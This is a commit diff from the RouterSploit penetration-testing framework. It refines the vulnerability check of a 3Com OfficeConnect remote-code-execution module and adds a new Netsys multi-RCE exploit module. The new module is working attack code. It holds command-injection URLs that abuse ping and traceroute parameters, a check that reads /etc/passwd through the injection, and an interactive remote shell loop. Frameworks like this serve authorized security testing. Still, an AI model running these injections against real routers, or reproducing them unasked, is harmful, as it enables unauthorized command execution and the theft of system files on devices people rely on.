Skip to content

R
routersploit
Commit f5b7619f by fwkz
Options

Merge branch 'master' of github.com:reverse-shell/routersploit

parents 9f7eb9a3 28438bcb
Showing with 97 additions and 4 deletions
routersploit/modules/exploits/3com/officeconnect_rce.py
......@@ -7,6 +7,7 @@ from routersploit import (
http_request,
mute,
validators,
random_text,
)
......@@ -65,11 +66,14 @@ class Exploit(exploits.Exploit):
def check(self):
url = "{}:{}/utility.cgi?testType=1&IP=aaa".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is None:
response1 = http_request(method="GET", url=url)
if response1 is None:
return False # target is not vulnerable
if response.status_code == 200:
return True # target is vulnerable
if response1.status_code == 200:
url = "{}:{}/{}.cgi".format(self.target, self.port, random_text(32))
response2 = http_request(method="GET", url=url)
if response2 is None or response1.text != response2.text:
return True # target is vulnerable
return False # target is not vulnerable
routersploit/modules/exploits/netsys/multi_rce.py 0 → 100644
import re
from routersploit import (
exploits,
print_status,
print_error,
print_success,
http_request,
mute,
validators,
random_text,
shell,
)
class Exploit(exploits.Exploit):
"""
Exploit implementation for Netsys multiple remote command execution vulnerabilities.
If the target is vulnerable it allows to execute commands on operating system level.
"""
__info__ = {
'name': 'Netsys Multi RCE',
'description': 'Exploits Netsys multiple remote command execution vulnerabilities that allows executing commands on operating system level',
'authors': [
'admin <admin[at]bbs.00wz.top>', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'http://bbs.00wz.top/forum.php?mod=viewthread&tid=12630',
],
'devices': [
'Multiple Netsys',
],
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address
port = exploits.Option(9090, 'Target port') # default port
injections = ["/view/IPV6/ipv6networktool/traceroute/ping.php?text_target=127.0.0.1&text_pingcount=1&text_packetsize=40|{}",
"/view/systemConfig/systemTool/ping/ping.php?text_target=127.0.0.1&text_pingcount=1&text_packetsize=40|{}",
"/view/systemConfig/systemTool/traceRoute/traceroute.php?text_target=127.0.0.1&text_ageout=2&text_minttl=1&text_maxttl=1|{}"]
valid = None
def run(self):
if self.check():
print_success("Target seems to be vulnerable")
print_status("Invoking command loop...")
shell(self, architecture="mipsel")
else:
print_error("Exploit failed - target seems to be not vulnerable")
def execute(self, cmd):
marker = random_text(16)
cmd = cmd.replace(" ", "+")
payload = "echo+{};{};echo+{};".format(marker, cmd, marker)
inj = self.valid.format(payload)
url = "{}:{}{}".format(self.target, self.port, inj)
response = http_request(method="GET", url=url)
if response is None:
return ""
regexp = "{}(.+?){}".format(marker, marker)
res = re.findall(regexp, response.text, re.DOTALL)
if len(res):
return res[0]
return ""
@mute
def check(self):
cmd = "cat+/etc/passwd;"
for injection in self.injections:
inj = injection.format(cmd)
url = "{}:{}{}".format(self.target, self.port, inj)
response = http_request(method="GET", url=url)
if response is None:
continue
if "root:" in response.text:
self.valid = injection
return True # target is vulnerable
return False # target not vulnerable
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment